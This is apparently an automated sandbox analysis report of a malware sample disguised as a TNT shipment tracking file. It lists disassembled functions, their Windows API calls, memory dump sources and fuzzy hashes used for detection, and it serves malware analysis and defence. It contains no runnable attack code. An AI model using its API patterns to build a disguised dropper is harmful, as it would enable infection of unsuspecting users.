                                                    Function 00EC35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1224 ec35b0-ec35bb 1225 ec35bd-ec35c2 1224->1225 1226 ec362f-ec3631 1224->1226 1225->1226 1227 ec35c4-ec35dc RegOpenKeyExW 1225->1227 1228 ec3620-ec3625 1226->1228 1227->1226 1229 ec35de-ec35fd RegQueryValueExW 1227->1229 1230 ec35ff-ec360a 1229->1230 1231 ec3614-ec361f RegCloseKey 1229->1231 1232 ec360c-ec360e 1230->1232 1233 ec3626-ec362d 1230->1233 1231->1228 1234 ec3612 1232->1234 1233->1234 1234->1231
                                                    APIs
                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00EC35A1,SwapMouseButtons,00000004,?), ref: 00EC35D4
                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00EC35A1,SwapMouseButtons,00000004,?,?,?,?,00EC2754), ref: 00EC35F5
                                                    • RegCloseKey.KERNELBASE(00000000,?,?,00EC35A1,SwapMouseButtons,00000004,?,?,?,?,00EC2754), ref: 00EC3617
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CloseOpenQueryValue
                                                    • String ID: Control Panel\Mouse
                                                    • API String ID: 3677997916-824357125
                                                    • Opcode ID: 35d00f86a57b2aacae23caf70a1fc4995fbebb9f719fee6bce0d5538fea630ea
                                                    • Instruction ID: af8119c12fb6fa0ea32f4793acfdedba645f42f39f87a9d691ba3543c8fac2d6
                                                    • Opcode Fuzzy Hash: 35d00f86a57b2aacae23caf70a1fc4995fbebb9f719fee6bce0d5538fea630ea
                                                    • Instruction Fuzzy Hash: B1115A75910208BFDB20CF68DD40EEEBBB8EF45744F0194A9F809E7210D2729F45A760
                                                    Function 00EE470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                    • String ID:
                                                    • API String ID: 2782032738-0
                                                    • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                    • Instruction ID: 1f5c5949d8d55bf6f71bac268453eeacf76d0c44109ea417437f1a898d8a7a30
                                                    • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                    • Instruction Fuzzy Hash: 3E41A5B5A007CD9BDB1C8EABC8809AE77A6EF41364F14917EF415A76C0E770DD408B84
                                                    Function 00EC7285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00EFEA39
                                                    • GetOpenFileNameW.COMDLG32(?), ref: 00EFEA83
                                                      • Part of subcall function 00EC4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EC4743,?,?,00EC37AE,?), ref: 00EC4770
                                                      • Part of subcall function 00EE0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EE07B0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                    • String ID: X
                                                    • API String ID: 3777226403-3081909835
                                                    • Opcode ID: 5751076fc4baf3be607ed09dd4fce27ebb15766f12a13420122b9f8b79d0685d
                                                    • Instruction ID: a4bffd52145d98a33a33e174abba5a1307c54c7244b3b591d1f19ec4fa7f8899
                                                    • Opcode Fuzzy Hash: 5751076fc4baf3be607ed09dd4fce27ebb15766f12a13420122b9f8b79d0685d
                                                    • Instruction Fuzzy Hash: DF21F670A0028C9BCB019F94CC45BEE7BF8AF48314F00801AE548BB242DFF5598ACF91
                                                    Function 00F28D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock_memmove
                                                    • String ID: EA06
                                                    • API String ID: 1988441806-3962188686
                                                    • Opcode ID: ae0f6417742474ae94ff8d47e444d5b88dca2713d40eb6981580a9144a7d2a13
                                                    • Instruction ID: 1d0c6a47fb23863b7fe7b882a6a2c9f703a5bfc489ea6b1dc115776ac5b76093
                                                    • Opcode Fuzzy Hash: ae0f6417742474ae94ff8d47e444d5b88dca2713d40eb6981580a9144a7d2a13
                                                    • Instruction Fuzzy Hash: 9501F972D042587EDF18CAA9C816EFE7BF8DB11311F00459BF552D2181E874E6089760
                                                    Function 00F298E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 00F298F8
                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00F2990F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Temp$FileNamePath
                                                    • String ID: aut
                                                    • API String ID: 3285503233-3010740371
                                                    • Opcode ID: 37bcc69790b26eb68a1169389bd454d440fe0a51fa0c1843865a22b41b03fbd6
                                                    • Instruction ID: d710f74107e522390e6917bbca019ef6dd0771745b77fef74a1d3acdced8d446
                                                    • Opcode Fuzzy Hash: 37bcc69790b26eb68a1169389bd454d440fe0a51fa0c1843865a22b41b03fbd6
                                                    • Instruction Fuzzy Hash: E4D05E7958030DABDB509FA0DC0EF9A773CE714700F0042B1BE58910A1EAB096999B92
                                                    Function 00F3CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ace6c776c74718864775eabbac9158f399679eeab55c07affc75f5258311bb47
                                                    • Instruction ID: 327b50ce167d2b956182e1b41ea5b51a1181c3fa1ef201683bae87765acccb38
                                                    • Opcode Fuzzy Hash: ace6c776c74718864775eabbac9158f399679eeab55c07affc75f5258311bb47
                                                    • Instruction Fuzzy Hash: ABF13A71A083019FC714DF28C984A6ABBE5FF88324F14892DF899AB351D735E945CF92
                                                    Function 00ECF76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EE0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EE0193
                                                      • Part of subcall function 00EE0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00EE019B
                                                      • Part of subcall function 00EE0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00EE01A6
                                                      • Part of subcall function 00EE0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00EE01B1
                                                      • Part of subcall function 00EE0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00EE01B9
                                                      • Part of subcall function 00EE0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00EE01C1
                                                      • Part of subcall function 00ED60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00ECF930), ref: 00ED6154
                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00ECF9CD
                                                    • OleInitialize.OLE32(00000000), ref: 00ECFA4A
                                                    • CloseHandle.KERNEL32(00000000), ref: 00F045C8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                    • String ID:
                                                    • API String ID: 1986988660-0
                                                    • Opcode ID: 75bfaed1c7b1a58096b4239f5001a6dd02f12160b905cb7a5755ebdff1970277
                                                    • Instruction ID: d7c706a891999706294221cdfd6e5b0acc1d2e814048c3db768c43766eaf1612
                                                    • Opcode Fuzzy Hash: 75bfaed1c7b1a58096b4239f5001a6dd02f12160b905cb7a5755ebdff1970277
                                                    • Instruction Fuzzy Hash: 9181EEB4901A48CFC784EF79AD646F87BE6FB88B06750812AD418CB372EB704485EF11
                                                    Function 00EC434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00EC4370
                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00EC4415
                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00EC4432
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell_$_memset
                                                    • String ID:
                                                    • API String ID: 1505330794-0
                                                    • Opcode ID: 298203c1763167751c620b19a22c7a9ec9ffd772ca1438a5e2c2ae5d3df0237b
                                                    • Instruction ID: 76f4aa0e4a038191e571bd7e138f85d2054ebebdb2c2a2cb79906f6b96633f69
                                                    • Opcode Fuzzy Hash: 298203c1763167751c620b19a22c7a9ec9ffd772ca1438a5e2c2ae5d3df0237b
                                                    • Instruction Fuzzy Hash: 6231C3B05047058FD721DF24D994BABBBF8FB48708F00092EE69A92291D771A945CB52
                                                    Function 00EE571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • __FF_MSGBANNER.LIBCMT ref: 00EE5733
                                                      • Part of subcall function 00EEA16B: __NMSG_WRITE.LIBCMT ref: 00EEA192
                                                      • Part of subcall function 00EEA16B: __NMSG_WRITE.LIBCMT ref: 00EEA19C
                                                    • __NMSG_WRITE.LIBCMT ref: 00EE573A
                                                      • Part of subcall function 00EEA1C8: GetModuleFileNameW.KERNEL32(00000000,00F833BA,00000104,?,00000001,00000000), ref: 00EEA25A
                                                      • Part of subcall function 00EEA1C8: ___crtMessageBoxW.LIBCMT ref: 00EEA308
                                                      • Part of subcall function 00EE309F: ___crtCorExitProcess.LIBCMT ref: 00EE30A5
                                                      • Part of subcall function 00EE309F: ExitProcess.KERNEL32 ref: 00EE30AE
                                                      • Part of subcall function 00EE8B28: __getptd_noexit.LIBCMT ref: 00EE8B28
                                                    • RtlAllocateHeap.NTDLL(01840000,00000000,00000001,00000000,?,?,?,00EE0DD3,?), ref: 00EE575F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                    • String ID:
                                                    • API String ID: 1372826849-0
                                                    • Opcode ID: e9aa6f97f819318cf3f1fc223e82889ee420de42a5098674bc78f89c92865d83
                                                    • Instruction ID: 9b5c6587ff07fd37a99181af4e62fdb196efd292e4e89ba672cfcb2afb51993d
                                                    • Opcode Fuzzy Hash: e9aa6f97f819318cf3f1fc223e82889ee420de42a5098674bc78f89c92865d83
                                                    • Instruction Fuzzy Hash: CF01F576200B9DDAD6142777EC42A6E77C88F82769F11243BF409BB292DE709C005760
                                                    Function 00F298A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00F29548,?,?,?,?,?,00000004), ref: 00F298BB
                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00F29548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00F298D1
                                                    • CloseHandle.KERNEL32(00000000,?,00F29548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F298D8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: File$CloseCreateHandleTime
                                                    • String ID:
                                                    • API String ID: 3397143404-0
                                                    • Opcode ID: 6357607d9b303f33f4ed060c0b5a69bb40c9a3f7d732e2d61e21405d0859f54f
                                                    • Instruction ID: ed28605f29ed503c3581014e3770da5c05f97ffb0079af7dbb46e4914a0e0c5d
                                                    • Opcode Fuzzy Hash: 6357607d9b303f33f4ed060c0b5a69bb40c9a3f7d732e2d61e21405d0859f54f
                                                    • Instruction Fuzzy Hash: 98E08636140228B7E7211FA4EC09FDA7B59AB57B70F144120FF18690E087B12515A798
                                                    Function 00F28D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _free.LIBCMT ref: 00F28D1B
                                                      • Part of subcall function 00EE2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00EE9A24), ref: 00EE2D69
                                                      • Part of subcall function 00EE2D55: GetLastError.KERNEL32(00000000,?,00EE9A24), ref: 00EE2D7B
                                                    • _free.LIBCMT ref: 00F28D2C
                                                    • _free.LIBCMT ref: 00F28D3E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: e92dce40d9500f9ac2a34e83b90a716ef22a9282606ba49fbfd8bfa905bb999e
                                                    • Instruction ID: 91d76975dee800b87233270072f1ed3b6ad5342e2afff92e98db422e96c00882
                                                    • Opcode Fuzzy Hash: e92dce40d9500f9ac2a34e83b90a716ef22a9282606ba49fbfd8bfa905bb999e
                                                    • Instruction Fuzzy Hash: AAE0C2A1A02A5083CB20A979BC40B8313DC4F483A2744080DB60DE7186CE64F8439024
                                                    Function 00ECA9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CALL
                                                    • API String ID: 0-4196123274
                                                    • Opcode ID: ee88899f77137a491913a1297142be56ea5846592613cad0e443f68519b8b9fe
                                                    • Instruction ID: 9b6befd6cadc3f73666c03aec71efc342e55942961eba15e3a5f8e28113a8a4f
                                                    • Opcode Fuzzy Hash: ee88899f77137a491913a1297142be56ea5846592613cad0e443f68519b8b9fe
                                                    • Instruction Fuzzy Hash: 75226970508245CFCB24DF14C555F6AB7E1BF84308F18996DE89AAB362D732EC42DB82
                                                    Function 00EC4C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: EA06
                                                    • API String ID: 4104443479-3962188686
                                                    • Opcode ID: c9851e314ca03625dddca79f4d1f7dd4dc4f95766d8e7e5d4f5732de6b052f21
                                                    • Instruction ID: bcd09471bef13d1709bfaffb1ae5de8da51cc356abae603ceb653b01ae24d051
                                                    • Opcode Fuzzy Hash: c9851e314ca03625dddca79f4d1f7dd4dc4f95766d8e7e5d4f5732de6b052f21
                                                    • Instruction Fuzzy Hash: 63417CA1A041585BDF216B548E71FFE7FF29B45300F28646CEC83BB2C2D6229D4683A1
                                                    Function 00EC47D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsThemeActive.UXTHEME ref: 00EC4834
                                                      • Part of subcall function 00EE336C: __lock.LIBCMT ref: 00EE3372
                                                      • Part of subcall function 00EE336C: DecodePointer.KERNEL32(00000001,?,00EC4849,00F17C74), ref: 00EE337E
                                                      • Part of subcall function 00EE336C: EncodePointer.KERNEL32(?,?,00EC4849,00F17C74), ref: 00EE3389
                                                      • Part of subcall function 00EC48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00EC4915
                                                      • Part of subcall function 00EC48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00EC492A
                                                      • Part of subcall function 00EC3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EC3B68
                                                      • Part of subcall function 00EC3B3A: IsDebuggerPresent.KERNEL32 ref: 00EC3B7A
                                                      • Part of subcall function 00EC3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00F852F8,00F852E0,?,?), ref: 00EC3BEB
                                                      • Part of subcall function 00EC3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00EC3C6F
                                                    • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00EC4874
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                    • String ID:
                                                    • API String ID: 1438897964-0
                                                    • Opcode ID: a8494de888e0347f14b2b3d3fde1b37a320b926de713d8010d2260eb3c918647
                                                    • Instruction ID: f69c93925a03d7b96004b59d06911ef0b0e8d294fe0c9a7c6498c6f8e969f10d
                                                    • Opcode Fuzzy Hash: a8494de888e0347f14b2b3d3fde1b37a320b926de713d8010d2260eb3c918647
                                                    • Instruction Fuzzy Hash: 0A11CD728083499BC700EF29E909E5EBFE8EF95750F10451EF444A32B2DB718949DB82
                                                    Function 00EC5C99 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00EC5821,?,?,?,?), ref: 00EC5CC7
                                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00EC5821,?,?,?,?), ref: 00EFDD73
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
